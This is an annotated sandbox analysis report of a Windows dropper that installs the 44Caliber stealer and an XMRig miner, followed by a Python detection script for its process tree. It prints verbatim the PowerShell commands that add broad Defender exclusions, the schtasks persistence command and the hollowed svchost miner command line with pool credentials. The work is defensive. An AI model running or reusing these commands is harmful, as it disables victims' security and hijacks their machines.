Malware Analysis Report

2024-11-13 14:23

Sample ID 220320-fzvv6shffq
Target 65119209.exe
SHA256 5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67
Tags: 44caliber xmrig miner spyware stealer evasion persistence
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: 5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67

Threat Level: Known bad

The file 65119209.exe was found to be: Known bad.

Malicious Activity Summary

44caliber xmrig miner spyware stealer evasion persistence

xmrig

44Caliber

XMRig Miner Payload

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK (Enterprise Matrix V6)

No technique mappings are recorded on this page for this sample.

Analysis: static1

Detonation Overview

Reported

2022-03-20 05:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win10v2004-20220310-en

Max time kernel

156s

Max time network

179s

Command Line

C:\Windows\System32\svchost.exe -k netsvcs -p

(This is the standard service-host invocation that happens to head the recorded process tree; it is not a malware command line. The sample itself was started as "C:\Users\Admin\AppData\Local\Temp\65119209.exe", see Processes below.)

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner (3 payload hits; the report records no description, indicator, process or target for them)

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\65119209.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | freegeoip.app | N/A | N/A (2 hits)

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{64E89760-4E29-4916-A728-277A21692A89}.catalogItem | C:\Windows\System32\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C1C55260-69B0-486B-A42E-C18F74F47F11}.catalogItem | C:\Windows\System32\svchost.exe | N/A
File created | C:\Windows\system32\services64.exe | C:\Windows\System32\conhost.exe | N/A
File opened for modification | C:\Windows\system32\services64.exe | C:\Windows\System32\conhost.exe | N/A
File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | C:\Windows\System32\conhost.exe | N/A
File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | C:\Windows\System32\conhost.exe | N/A

The two InstallService .catalogItem writes come from the legitimate service host (they go with the licensing.mp.microsoft.com and storesdk traffic in the Network section) and are Windows background activity. The rows attributed to conhost.exe are the real drops: services64.exe, which the scheduled task below persists, sihost64.exe, and the WR64.sys kernel driver, the last two placed in a System32\Microsoft\Libs directory that Windows itself does not create. The page gives no hash for WR64.sys; XMRig-based miners normally ship the WinRing0 driver for MSR access, which is the likely identity, but that is an inference rather than something the report states.

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\KLNR.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4916 set thread context of 4208 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe

PID 4916 is the conhost.exe instance launched for services64.exe and PID 4208 is an svchost.exe it created. Taken together with the 15 WriteProcessMemory calls from 4916 into 4208 below and the three memory dumps of PID 4208 at 0x140000000 in the Files section, this is process hollowing: the miner image is written into a suspended svchost.exe and its main thread is redirected to it.

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Insidious2.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Insidious2.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\svchost.exe | N/A

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\System32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\svchost.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Hits
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious2.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A | 2
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 4

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\KLNR.exe | N/A

Suspicious use of WriteProcessMemory

Source process (PID) | Target process (PID) | Writes
C:\Users\Admin\AppData\Local\Temp\65119209.exe (3900) | C:\Users\Admin\AppData\Local\Temp\KLNR.exe (1484) | 3
C:\Users\Admin\AppData\Local\Temp\65119209.exe (3900) | C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe (1156) | 2
C:\Users\Admin\AppData\Local\Temp\65119209.exe (3900) | C:\Users\Admin\AppData\Local\Temp\Insidious2.exe (1352) | 2
C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe (1156) | C:\Windows\System32\conhost.exe (3928) | 3
C:\Users\Admin\AppData\Local\Temp\KLNR.exe (1484) | C:\Windows\SysWOW64\fondue.exe (2472) | 3
C:\Windows\SysWOW64\fondue.exe (2472) | C:\Windows\system32\FonDUE.EXE (2416) | 2
C:\Windows\System32\conhost.exe (3928) | C:\Windows\System32\cmd.exe (2324) | 2
C:\Windows\System32\cmd.exe (2324) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3784) | 2
C:\Windows\System32\conhost.exe (3928) | C:\Windows\System32\cmd.exe (1756) | 2
C:\Windows\System32\cmd.exe (1756) | C:\Windows\system32\schtasks.exe (4112) | 2
C:\Windows\System32\cmd.exe (2324) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (4136) | 2
C:\Windows\System32\conhost.exe (3928) | C:\Windows\System32\cmd.exe (4436) | 2
C:\Windows\System32\cmd.exe (4436) | C:\Windows\system32\services64.exe (4492) | 2
C:\Windows\system32\services64.exe (4492) | C:\Windows\System32\conhost.exe (4916) | 3
C:\Windows\System32\conhost.exe (4916) | C:\Windows\System32\cmd.exe (5016) | 2
C:\Windows\System32\cmd.exe (5016) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (5072) | 2
C:\Windows\System32\conhost.exe (4916) | C:\Windows\system32\Microsoft\Libs\sihost64.exe (4000) | 2
C:\Windows\System32\conhost.exe (4916) | C:\Windows\System32\svchost.exe (4208) | 15
C:\Windows\System32\cmd.exe (5016) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (4204) | 2
C:\Windows\system32\Microsoft\Libs\sihost64.exe (4000) | C:\Windows\System32\conhost.exe (4452) | 3

The original report lists one row per write; the table above collapses identical rows and keeps the count. Two or three writes from a parent into a child it has just created appear for every parent/child pair in the tree, including pairs that are plainly ordinary process creation (cmd.exe starting powershell.exe or schtasks.exe), so they carry no signal on their own. The outlier is the 15 writes from conhost.exe (4916) into svchost.exe (4208), the same pair flagged under SetThreadContext above: that is the miner image being written into a hollowed svchost.exe. The PIDs in this table are also the only place the report ties process names to PIDs, which is needed to read the WerFault and memory-dump entries further down.

Processes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Users\Admin\AppData\Local\Temp\65119209.exe

"C:\Users\Admin\AppData\Local\Temp\65119209.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

(The process named conhost.exe here is not the console host doing its normal job: it is given the loader's path as its argument and then runs the Defender-exclusion commands, the schtasks persistence and the drops into System32 listed below. It also executes managed code, which is why the Files section contains a CLR usage log named conhost.exe.log. The same trick is repeated further down for services64.exe.)

C:\Windows\SysWOW64\fondue.exe

"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Windows\system32\FonDUE.EXE

"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll

(fondue.exe is the Windows Features-on-Demand prompt. The CLR shim mscoreei.dll launches it when a .NET 2.0/3.5 program starts on a machine that lacks the NetFx3 feature, so these two entries show that KLNR.exe was built for the older runtime, not that fondue.exe was abused.)

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\svchost.exe

C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=WarzoneHACK --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

(This is the hollowed svchost.exe, PID 4208, and its arguments are the miner IOCs: pool mine.bmpool.org:6004, worker/user 6238470, password WarzoneHACK, RandomX ("rx/0"), capped at 40% of CPU threads. The --cinit-* switches are not stock XMRig options; they belong to the loader that wraps the miner, and the idle-wait, idle-cpu and stealth settings make it pause or throttle while the machine is in use, which is one plausible reason no pool connection shows up in the Network section during the 179-second capture. The forward slash in C:\Windows/System32\svchost.exe is how the loader writes the path and is itself a usable detection string.)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 4208 -ip 4208

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4208 -s 292

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 464 -p 4208 -ip 4208

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4208 -s 300

(Every WerFault.exe invocation targets PID 4208, the svchost.exe hosting the miner, so the hollowed process crashed twice during the run; the three memory dumps of 4208 under Files were taken from it. The conhost.exe started with "/sihost64" is the instance spawned by sihost64.exe, PID 4452 in the WriteProcessMemory table.)
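The command lines above are enough to write detections for everything this loader does: Defender exclusions added with Add-MpPreference, an on-logon scheduled task at the highest run level, executables carrying system-binary names outside the directories those names belong to, conhost.exe started with a payload path as its argument, and an svchost.exe whose parent is not services.exe and whose arguments are a miner's. The block below is an added example written for this page, not code from the sandbox vendor or from the sample's authors. It runs those rules over constructed process-creation events whose PIDs and command lines are copied from this report (parent links come from the WriteProcessMemory rows; PIDs 500, 700 and 900 are an invented benign services.exe/svchost.exe pair used as a control) and pulls the pool, user and password out of the miner command line as IOCs. The rule names are this example's own.

```python
"""Triage rules for the process tree in this report: Defender-exclusion
tampering, on-logon tasks, system-binary lookalikes, hollowed svchost.exe,
conhost.exe used as a launcher, and XMRig-style command lines with their IOCs."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Names this sample borrows (services64.exe, sihost64.exe) or hollows (svchost.exe).
SYSTEM_NAME_RE = re.compile(r"^(svchost|conhost|services|sihost|lsass|csrss|winlogon)(\d+)?\.exe$")
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Extension|Process|IpAddress)\s+(\S+)", re.I)
CONHOST_LAUNCH_RE = re.compile(r'conhost\.exe"?\s+"[^"]+\.exe"', re.I)
MINER_OPT_RE = re.compile(r'--(url|user|pass|algo)=("?)([^"\s]+)\2')


def _split(path: str):
    """Normalise separators and case, then split into (directory, basename)."""
    directory, _, name = path.replace("/", "\\").lower().rpartition("\\")
    return directory, name


def parse_schtasks(cmdline: str) -> Dict[str, str]:
    """Pull /sc, /rl, /tn and /tr out of a 'schtasks /create' command line."""
    out: Dict[str, str] = {}
    for key in ("sc", "rl", "tn", "tr"):
        m = re.search(rf'/{key}\s+"([^"]+)"|/{key}\s+(\S+)', cmdline, re.I)
        if m:
            value = m.group(1) or m.group(2)
            out[key] = value.lower() if key in ("sc", "rl") else value
    return out


def extract_miner_iocs(cmdline: str) -> Dict[str, str]:
    """Return the --url/--user/--pass/--algo values (quotes stripped) from a miner command line."""
    return {key: value for key, _, value in MINER_OPT_RE.findall(cmdline)}


def analyze(events: List[ProcEvent]) -> List[Dict[str, object]]:
    by_pid = {e.pid: e for e in events}
    findings: List[Dict[str, object]] = []

    def hit(rule: str, e: ProcEvent, detail: str) -> None:
        findings.append({"rule": rule, "pid": e.pid, "detail": detail})

    for e in events:
        directory, name = _split(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = _split(parent.image)[1] if parent else ""
        m = EXCLUSION_RE.search(e.cmdline)
        if m:  # Defender exclusion being added from a command line
            hit("defender_exclusion", e, f"-Exclusion{m.group(1)} {m.group(2)}")
        if name == "schtasks.exe" and "/create" in e.cmdline.lower():
            task = parse_schtasks(e.cmdline)
            if task.get("sc") in ("onlogon", "onstart") and task.get("rl") == "highest":
                hit("onlogon_task_highest", e, f"{task.get('tn')} -> {task.get('tr')}")
        sm = SYSTEM_NAME_RE.match(name)
        if sm and (sm.group(2) or directory not in SYSTEM_DIRS):  # services64.exe, Libs\sihost64.exe
            hit("system_name_lookalike", e, e.image)
        if name == "svchost.exe" and parent_name != "services.exe":  # hollowing target
            hit("svchost_unexpected_parent", e, f"parent={parent_name or 'unknown'}")
        if name == "conhost.exe" and CONHOST_LAUNCH_RE.search(e.cmdline):  # conhost.exe "payload.exe"
            hit("conhost_launcher", e, e.cmdline)
        iocs = extract_miner_iocs(e.cmdline)
        if "url" in iocs and ("user" in iocs or "algo" in iocs):
            hit("miner_cmdline", e, f"pool={iocs['url']} user={iocs.get('user')} algo={iocs.get('algo')}")
    return findings


# Constructed sample input (not sandbox output): PIDs and command lines come
# from the behavioral2 tree above, parent links from its WriteProcessMemory
# rows; PIDs 500/700/900 are an invented benign services.exe -> svchost.exe pair.
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
S32 = r"C:\Windows\System32"
PS = S32 + r"\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(700, 500, S32 + r"\services.exe", S32 + r"\services.exe"),
    ProcEvent(900, 700, S32 + r"\svchost.exe", S32 + r"\svchost.exe -k netsvcs -p"),
    ProcEvent(3900, 1, TEMP + r"\65119209.exe", f'"{TEMP}\\65119209.exe"'),
    ProcEvent(1156, 3900, TEMP + r"\WARZONEHACK.exe", f'"{TEMP}\\WARZONEHACK.exe"'),
    ProcEvent(3928, 1156, S32 + r"\conhost.exe", f'"{S32}\\conhost.exe" "{TEMP}\\WARZONEHACK.exe"'),
    ProcEvent(3784, 2324, PS, r'powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"'),
    ProcEvent(4136, 2324, PS, r'''powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"'''),
    ProcEvent(4112, 1756, S32 + r"\schtasks.exe", r'schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"'),
    ProcEvent(4492, 4436, S32 + r"\services64.exe", S32 + r"\services64.exe"),
    ProcEvent(4916, 4492, S32 + r"\conhost.exe", f'"{S32}\\conhost.exe" "{S32}\\services64.exe"'),
    ProcEvent(4000, 4916, S32 + r"\Microsoft\Libs\sihost64.exe", f'"{S32}\\Microsoft\\Libs\\sihost64.exe"'),
    ProcEvent(4208, 4916, S32 + r"\svchost.exe", r'C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=WarzoneHACK --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth'),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['rule']:<26} pid={f['pid']:<5} {f['detail']}")
```

Feeding real Sysmon event ID 1 or EDR process-creation records in needs only a small adapter to ProcEvent. The svchost.exe parent check is the highest-value rule here, because a legitimate svchost.exe is started by services.exe; the conhost rule is worth keeping because the real console host is started by csrss.exe with a numeric handle argument, never with a quoted .exe path; and the benign pair (PIDs 700/900) is in the sample precisely so that neither rule fires on normal service-host activity.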

Network

Country | Destination | Domain | Proto
US | 93.184.220.29:80 | | tcp
US | 93.184.220.29:80 | | tcp
US | 8.8.8.8:53 | crl4.digicert.com | udp
US | 93.184.220.29:80 | crl4.digicert.com | tcp
US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp
US | 20.96.63.25:443 | licensing.mp.microsoft.com | tcp
US | 8.8.8.8:53 | storesdk.dsx.mp.microsoft.com | udp
NL | 104.80.225.205:443 | storesdk.dsx.mp.microsoft.com | tcp
US | 93.184.220.29:80 | crl4.digicert.com | tcp
US | 20.96.63.25:443 | licensing.mp.microsoft.com | tcp
US | 20.96.63.25:443 | licensing.mp.microsoft.com | tcp
US | 20.96.63.25:443 | licensing.mp.microsoft.com | tcp
US | 93.184.220.29:80 | crl4.digicert.com | tcp
US | 8.8.8.8:53 | freegeoip.app | udp
US | 188.114.97.0:443 | freegeoip.app | tcp
US | 93.184.220.29:80 | crl4.digicert.com | tcp

Only the freegeoip.app lookup is attributable to the sample (the stealer's external-IP and geolocation check flagged above). The DigiCert CRL fetches and the Microsoft licensing and storesdk connections are Windows background traffic. No connection to the mining pool mine.bmpool.org:6004 named on the svchost.exe command line was recorded within the 179-second network window, so the pool address comes from the command line alone.

Files

memory/3900-134-0x0000000000400000-0x000000000093C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KLNR.exe (recorded twice with identical hashes)

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe (recorded twice with identical hashes)

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe (recorded twice with identical hashes)

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

memory/1352-141-0x0000000000380000-0x00000000003CA000-memory.dmp

memory/1352-142-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/1352-143-0x00000000022F0000-0x00000000022F2000-memory.dmp

memory/3928-144-0x0000029EFCBD0000-0x0000029EFCDF1000-memory.dmp

memory/3928-145-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/3928-146-0x0000029E99750000-0x0000029E99752000-memory.dmp

memory/3928-147-0x0000029EFEA80000-0x0000029EFEA92000-memory.dmp

memory/3928-148-0x0000029E99753000-0x0000029E99755000-memory.dmp

memory/3928-149-0x0000029E99756000-0x0000029E99757000-memory.dmp

memory/3784-151-0x00000219E1940000-0x00000219E1942000-memory.dmp

memory/3784-150-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/3784-152-0x00000219E1943000-0x00000219E1945000-memory.dmp

memory/3784-153-0x00000219E1900000-0x00000219E1922000-memory.dmp

memory/3784-154-0x00000219E1946000-0x00000219E1948000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a8e8360d573a4ff072dcc6f09d992c88
SHA1 3446774433ceaf0b400073914facab11b98b6807
SHA256 bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA512 4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

memory/4136-157-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4136-159-0x000001FAAA0F3000-0x000001FAAA0F5000-memory.dmp

memory/4136-158-0x000001FAAA0F0000-0x000001FAAA0F2000-memory.dmp

memory/4136-160-0x000001FAAA0F6000-0x000001FAAA0F8000-memory.dmp

memory/4136-161-0x000001FAAA0F8000-0x000001FAAA0F9000-memory.dmp

C:\Windows\System32\services64.exe (recorded twice with identical hashes)

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

(All four hashes match WARZONEHACK.exe above: the file persisted by the "services64" scheduled task is a byte-for-byte copy of the miner loader, so one hash set covers both the dropped and the persisted file.)

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 b245679121623b152bea5562c173ba11
SHA1 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA256 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA512 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60043e15d97bc9bf466a229c31d59463
SHA1 0ffdf799c4af5055caf6c5e6e20a7757c903af83
SHA256 d57675fec62cbf5ec9110a93b81ed55411830ef22e1719196632bdd3fca0c564
SHA512 47dde4c7e36ae73798d57f57d4e7ac7ca164297c14330911d50fcafa96b3b6211ccbb56b8cdc546214885ed99bdaa07b7a4aef62cd9e63d693ed7f6052541670

C:\Windows\System32\Microsoft\Libs\sihost64.exe (recorded twice with identical hashes)

MD5 3721b324b4d2c9dea6c6bc6a858fe337
SHA1 f3391c6414ed5bb89acc4ab5df2b837077a9a9c6
SHA256 fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206
SHA512 bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

memory/5072-168-0x00000264345B8000-0x00000264345B9000-memory.dmp

memory/4916-169-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4916-170-0x000001E764770000-0x000001E764772000-memory.dmp

memory/4916-171-0x000001E764773000-0x000001E764775000-memory.dmp

memory/4916-172-0x000001E764776000-0x000001E764777000-memory.dmp

memory/5072-173-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/5072-174-0x00000264345B0000-0x00000264345B2000-memory.dmp

memory/5072-175-0x00000264345B3000-0x00000264345B5000-memory.dmp

memory/5072-176-0x00000264345B6000-0x00000264345B8000-memory.dmp

memory/4208-177-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4208-178-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4208-179-0x0000000140000000-0x0000000140786000-memory.dmp

(These three dumps are the same 0x786000-byte region, about 7.5 MB, in PID 4208, the hollowed svchost.exe. 0x140000000 is the default image base for 64-bit PE files, so the region is the injected miner image rather than anything that belongs to svchost.exe; it is the dump to carve if you want the unpacked XMRig binary.)

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce4540390cc4841c8973eb5a3e9f4f7d
SHA1 2293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256 e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA512 2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

memory/4204-181-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4204-182-0x00000186D7440000-0x00000186D7442000-memory.dmp

memory/4204-183-0x00000186D7443000-0x00000186D7445000-memory.dmp

memory/4204-184-0x00000186D7446000-0x00000186D7448000-memory.dmp

memory/4452-185-0x00000238035A0000-0x00000238035A7000-memory.dmp

memory/4452-186-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4452-188-0x000002381F0E3000-0x000002381F0E5000-memory.dmp

